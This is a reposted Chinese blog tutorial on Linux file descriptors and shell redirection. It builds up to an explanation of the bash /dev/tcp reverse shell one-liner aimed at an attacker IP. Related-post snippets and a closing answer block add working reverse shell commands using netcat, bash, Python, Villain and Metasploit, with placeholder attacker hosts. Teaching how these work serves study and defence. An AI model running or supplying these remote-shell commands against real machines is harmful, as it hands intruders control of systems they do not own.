反弹shell之重定向

转载 已于 2022-04-18 20:25:07 修改 · 307 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://www.cnblogs.com/LittleHann/p/12038070.html
文章标签:

#linux

于 2022-04-14 21:40:35 首次发布
本文详细介绍了Linux文件描述符的概念,如何工作,以及重定向操作,包括输入重定向、输出重定向、标准输出与错误输出的混合重定向。重点讲解了标准输入、输出和错误输出的默认文件描述符,并演示了如何通过文件描述符进行文件重定向,以及在shell命令中的应用实例,如远程交互式shell和数据通信。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 linux文件描述符可以理解为linux跟踪打开文件而分配的一个数字句柄,这个数字本质上是一个文件句柄,通过句柄就可以实现文件的读写操作。

当Linux启动的时候会默认打开三个文件描述符,分别是:

  • 标准输入:standard input 0 (默认设备键盘)
  • 标准输出:standard output 1(默认设备显示器)
  • 错误输出:error output 2(默认设备显示器)

进程启动后再打开新的文件,描述符会自动依次增加。每一个新进程都会继承其父进程的文件描述符,因此所有的shell命令(本质上也是启动新进程),都会默认有三个文件描述符。

Linux一切皆文件,键盘、显示器设备也是文件,因此他们的输入输出也是由文件描述符控制。如果我们有时候需要让输出不显示在显示器上,而是输出到文件或者其他设备,那我们就需要重定向。

2. 重定向

重定向主要分为两种

  • 输入重定向
    • “<”
    • “<<”
  • 输出重定向
    • “>”
    • “>>”

注意:“>”会覆盖原内容,比如file文件原有内容222, echo > 111 file 会覆盖222而写入111

而“>>”会在原内容后添加

bash在执行一条指令的时候,首先会检查命令中是否存在文件描述符重定向的符号,如果存在那么首先将文件描述符重定向(预处理),然后在把重定向去掉,继续执行指令。如果指令中存在多个重定向,重定向从左向右解析

1)输入重定向

[n]< word 
(注意[n]与<之间没有空格)

说明:将文件描述符 n 重定向到 word 指代的文件(以只读方式打开),如果n省略就是0(标准输入)。

解析器解析到 "<" 以后会先处理重定向,将标准输入重定向到file,之后cat再从标准输入读取指令的时候,由于标准输入已经重定向到了file ,于是cat就从file中读取指令了。

2)输出重定向

[n]> word

说明: 将文件描述符 n 重定向到word 指代的文件(以写的方式打开),如果n 省略则默认就是 1(标准输出)。

上述指令将文件描述符1(标准输出)重定向到了指定文件。

3)标准输出与标准错误输出重定向

下面3种形式完全等价,

&> word 
>& word
> word 2>&1:将标准错误输出复制到标准输出

说明:将标准输出与标准错误输出都定向到word代表的文件(以写的方式打开)。

解释:我们首先执行了一个错误的命令,可以看到错误提示被写入文件(正常情况下是会直接输出的),我们又执行了一条正确的指令,发现结果也输入到了文件,说明正确错误消息都能输出到文件。

4)文件描述符的复制

[n]<&[m] 
n]>&[m] 
注意:这里所有字符之间不要有空格
  • 这两个指令都是将文件描述符 n 复制到 m ,两者的区别是
    • [n]<&[m] :以只读的形式打开
    • n]>&[m] :以写的形式打开
  • 这里的 & 目的是为了区分数字名字的文件和文件描述符,如果没有 & 系统会认为是将文件描述符重定向到了一个数字作为文件名的文件,而不是一个文件描述符

重定向符号的顺序不能随便换,因为系统是从左到右执行。我们来分析上面指令结果出现的原理,

首先解析器解析到 2>&1

解析器再向后解析到 “>” 

注意:一条命令只能设置重定向一次0,1,2(标准输入,标准输出,标准错误输出)

这句命令是将 (1>&2)标准输出重定向到标准错误输出,在将(>)标准输出重定向到文件file,但是依然输出到了终端而不是文件里,这就说明了一条命令只能设置重定向一次

bash -i >& /dev/tcp/192.168.146.129/2333 0>&1
  • “bash -i”:bash 是linux的一个比较常见的shell,除此之外还有 sh、zsh、等,他们之间有着细小差别
  • “-i”:这个参数表示的是产生交互式的shell
  • “/dev/tcp/ip/port”:/dev/tcp|udp/ip/port 这个文件可以将其看成一个设备(Linux下一切皆文件),对这个文件进行读写,就能实现与监听端口的服务器的socket通信
  • ”>&“:混合输出(错误、正确输出都输出到一个地方),避免受害者机器上依然能看到我们在攻击者机器中执行的指令
  • 0>&1:输入0是由 /dev/tcp/192.168.146.129/2333 输入的,也就是攻击机的输入,命令执行的结果1,会输出到 /dev/tcp/192.168.146.129/2333 上,这就形成了一个回路,实现了我们远程交互式shell 的功能

    •  

      ​​​​​​​

pengyuyan.icu
关注
Linux反弹shell重定向的理解(个人见底、方家斧正)
痴人说梦梦中人
09-26 779
重定向反弹shell中的利用 攻击机执行命令(IP:192.168.59.128): nc -l -vv -p 1234 靶机执行命令: bash -i &> /dev/tcp/192.168.59.128/1234 0>&1 攻击机执行命令中: -l 开启连接监听(TCP) -vv 详细信息(不是我写错了,可以是双V,展示更详细信息) -p 靶机连接攻击机的端...
Linux重定向反弹shell详解
无心的博客
10-19 1025
这里说Linux重定向的原因主要还是为了详细了解一下Linux中的反弹shell 目录 0x01 文件描述符 0x02 重定向 0x03 反弹shell 0x04 交互重定向 0x05 命令变形 0x01 文件描述符 Linux的文件描述符有以下三种 标准输入:0 标准输出:1 错误输出:2 对于文件描述符就先知道这些就可以了,具体的使用会在重定向中来说,重定向就是对文件描述符的操作 0...
初识反弹shell重定向
qq_51954912的博客
08-16 530
什么是反弹shell shell:是操作主机的接口。 则反弹shell就是:攻击端监听目标的某TCP/UDP端口 ,目标发起请求到该端口上,命令行的输入输出转到攻击端。简单地说就是把自己的shell送给别人,使别人可以操控自己的计算机 ​ 为什么要反弹shell 假如我们攻击了一台机器,打开了该机器的一个端口,然后攻击者用自己的工具连接目标,这是正向连接。 但是有些情况下正向连接不能奏效,那就需要反弹shell了 ​ 常用于如下原因: 1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。 2.目
反弹shell讲解之基础重定向讲解篇
weixin_44270509的博客
05-16 598
反弹shell讲解linux 反弹shell先了解一些基本的linux知识重定向简单重定向示例升级重定向(混合输出): linux 反弹shell 先了解一些基本的linux知识 首先,我们先了解一些linux执行的定义: 在linux中 ::: 0 代表着标准输入 标准输入默认是键盘输入 1 代表着标准输出 标准输出默认是显示输出 ...
网络安全之反弹Shell
小飞的博客
04-12 2014
在网络安全和渗透测试领域,“正向Shell”(Forward Shell)和"反向Shell"(Reverse Shell)是两种常用的技术手段,用于建立远程访问目标计算机的会话。这两种技术都可以让攻击者在成功渗透目标系统后执行命令,但它们在建立连接的方式上有所不同。
反弹shell流量分析与检测
欢迎光临
08-30 1499
常用的隧道技术:网络层:ipv6、Icmp、greIPv6隧道:将ipv6报文放入ipv4作为载体进行传输,工具:socat、6tunnelICMP隧道:将数据放入ping包中进行传输,工具:icmpsh、PingTunnelGRE隧道传输层:TCP隧道、UDP隧道、常规的端口转发。端口转发:没有端口限制就正常的内网端口转发,有端口限制就本地端口转发 工具:lcx、nc、powercatSOCKS代理:SOCKS代理可以理解为增强版的lcx。
Linux反弹Shell的多种技巧
安心写bug的博客
08-10 1290
反弹Shell(Reverse Shell)主要用来实现反向连接,突破防火墙限制、权限不足、端口限制、动态IP、内网NAT等情况,这些限制使得传统的正向连接(如SSH、Telnet等)难以实现。
浅析Linux之bash反弹shell原理
01-08
反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口...
Bash重定向反弹Shell相关
車鈊的博客
03-08 914
文章目录BASH重定向文件描述符一般重定向及特殊符号对文件描述符重定向组合型的重定向关于重定向需要重点强调的1.`&`用于表示该文件所指向的文件或流(&句柄号),而不再是该文件本身2.command `%>` file3.`cmd 0>1`和`cmd >file 0>&1`,文件和句柄4.`cmd >/dev/null 2>/dev/null`交互式Bash反弹shell测试Q/A问题1:问题2:参考链接:参考链接: BASH重定向 文件描述符
shell重定向
sehnsucht
04-08 273
文章目录shell重定向输入重定向<输出重定向>输出重定向>>其他 shell重定向 shell重定向功能可以临时改变命令执行时默认的输入和输出设备 输入重定向: < 输出重定向: > 和 >> 输入重定向< 从文件中获得命令需要的输入数据,适合数据源已经定义好,可重复利用 例如 cat < test.txt 显示文件test.txt的内容 wc < test.txt 统计文件readme.txt中的行数,单词数和字符数 很多命令可以直接
Linux反弹Shell
qq_41701460的博客
03-25 1184
被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。
Shell重定向以及基础的bash反弹shell的学习
BrosyveryOK的博客
09-14 1840
最近学了下shell脚本的编写,看见重定向想起前几天反弹shell的一道题,当时还看不太懂,学完重定向之后就有点能看懂了,写篇文章记录一下。
Shell的命令的结果重定向
jjavaboy的专栏
06-22 1571
在系统内部,UNIX是以一个整数数字,称为文件描述符(file descriptors),表示每个进程打开的文件。传统上,Shell允许打开至多10个文件,文件描述符从0,1,2,...,9 一般来说, 文件描述符0,表示标准输入 文件描述符1,表示标准输出 文件描述符2,表示标准错误输出 比如,将程序的输出传输到一个文件,而程序的错误信息输出到另一个文件: make 1>
Linuxshell基础、重定向、管道符、环境变量
dlin33的博客
12-04 374
1、什么是shell   Shell是系统的用户界面,提供了用户与内核进行交互操作的一种接口(命令解释器)。它接收用户输入的命令并把它送入内核去执行。起着协调用户与系统的一致性和在用户与系统之间进行交互的作用。   ShellLinux系统上具有极其重要的地位    2、命令解释过程   Shell可以执行:内部命令、应用程序、shell脚本    3、Shell的种类   常见的各...
Linux学习笔记之七(进程管理下和重定向上)
工科僧的博客
07-04 530
接六。上一讲的命令都是看内核版本,如何看centos的发行版本呢?我们当时下的就是1804的版本。我们人看到的是user,group,process,file,而计算机看但是uid,gid,pid,ppid,inode num。计算机管理进程需要知道pid,我们要想干预进程的管理呢,就知道pid,当然启动进程只需要运行程序文件即可。那么如何查看指定进程的pid呢,以方便我们去管理呢?有以下方式:一...
网络安全-反弹shell详解(攻击,检测与防御)
关注网络安全、云原生安全
09-21 6313
简介 如果我们需要到服务器上执行 Shell 命令,但是因为防火墙等原因,无法由客户端主动发起连接的情况,就可以使用反弹 Shell 来满足登陆和操作的需求。 原理 反弹shell bash php python nc telnet perl 参考 ​​​​​​基于主机的反弹shell检测思路 - 哔哩哔哩 常用的反弹shell总结_西部壮仔的博客-优快云博客_反弹shell能干嘛 ...
Bash shell 重定向
revilwang的专栏
12-22 7162
最近在看代码的时候看到了很多关于shell重定向的使用,所以特地学习了官方Bash手册,并结合一个网友的博客,在此将内容总结整理一下。 一、shell指令执行的顺序 bash启动的时候会默认打开3个文件描述符,当它运行一条指令的时候,会先fork一个子进程,子进程会继承这3个文件描述符,然后设定好重定向之后,再执行指令。严格按照这个顺序会很容易理解重定向。 需要注意的几点是:
详解shell中的几种标准输出重定向方式
热门推荐
yuki5233的博客
01-07 2万+
shell重定向介绍 无论是用什麽语言开发的程序,都会处理外部的输入,然后将运算结果输出到指定的位置。在交互式的程序中,输入来自用户的键盘和鼠标,结果输出到用户的屏幕,甚至到其他播放设备中。而对于某些后台运行的程序,输入可能来自于外部的一些文件,运算的结果通常又需要写到其他的文件中。比如:程序在运行的过程中,会有一些关键性的信息,比如异常堆栈,外部接口调用情况等,这些都会统统写到日志文件里。 sh...
反弹shell
最新发布
06-08
### 反弹 Shell 在 Kali Linux 中的实现方法及工具 反弹 Shell 是一种常见的技术,用于将目标主机的命令行界面(Shell)连接到攻击者控制的机器上。以下是几种在 Kali Linux 中实现反弹 Shell 的方法和工具。 #### 1. 使用 Netcat 实现反弹 Shell Netcat 是一个功能强大的网络工具,能够通过 TCP 或 UDP 连接传输数据。以下是一个典型的反弹 Shell 命令: ```bash nc -e /bin/bash [攻击者IP] [端口号] ``` 此命令会在目标机器上执行 `/bin/bash` 并将其输出发送到指定的攻击者 IP 和端口[^3]。攻击者需要在自己的机器上监听连接: ```bash nc -lvnp [端口号] ``` #### 2. 使用 Bash 实现反弹 Shell Bash 内置了网络功能,可以通过以下命令实现反弹 Shell: ```bash bash -i >& /dev/tcp/[攻击者IP]/[端口号] 0>&1 ``` 这条命令会将 Bash 输入输出重定向到指定的 TCP 连接[^1]。攻击者同样需要在自己的机器上使用 `nc -lvnp [端口号]` 来监听连接。 #### 3. 使用 Python 实现反弹 Shell Python 提供了一个简单的脚本实现反弹 Shell: ```python import socket, subprocess, os s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("[攻击者IP]", [端口号])) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) subprocess.call(["/bin/sh", "-i"]) ``` 这段代码会建立与攻击者机器的连接,并启动交互式 Shell[^2]。 #### 4. 使用 Villain 工具生成 Payload Villain 是一个现代的反向 Shell 工具,支持多种平台和编码方式。以下是如何使用 Villain 生成 Linux 反弹 Shell 的示例: ```bash villain > help generate villain > generate payload=linux/hoaxshell/sh_curl lhost=[攻击者IP] lport=[端口号] ``` 生成的 Payload 可以直接在目标机器上执行,从而建立反弹连接[^2]。 #### 5. 使用 Metasploit 框架 Metasploit 是 Kali Linux 中最强大的渗透测试工具之一,支持多种类型的反弹 Shell。以下是一个简单的示例: ```ruby use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set LHOST [攻击者IP] set LPORT [端口号] exploit ``` 此配置会启动一个监听器,等待目标机器上的 Payload 连接[^3]。 #### 注意事项 所有上述方法均需确保合法授权下使用,仅限于学习和研究目的。未经授权的使用可能导致法律后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值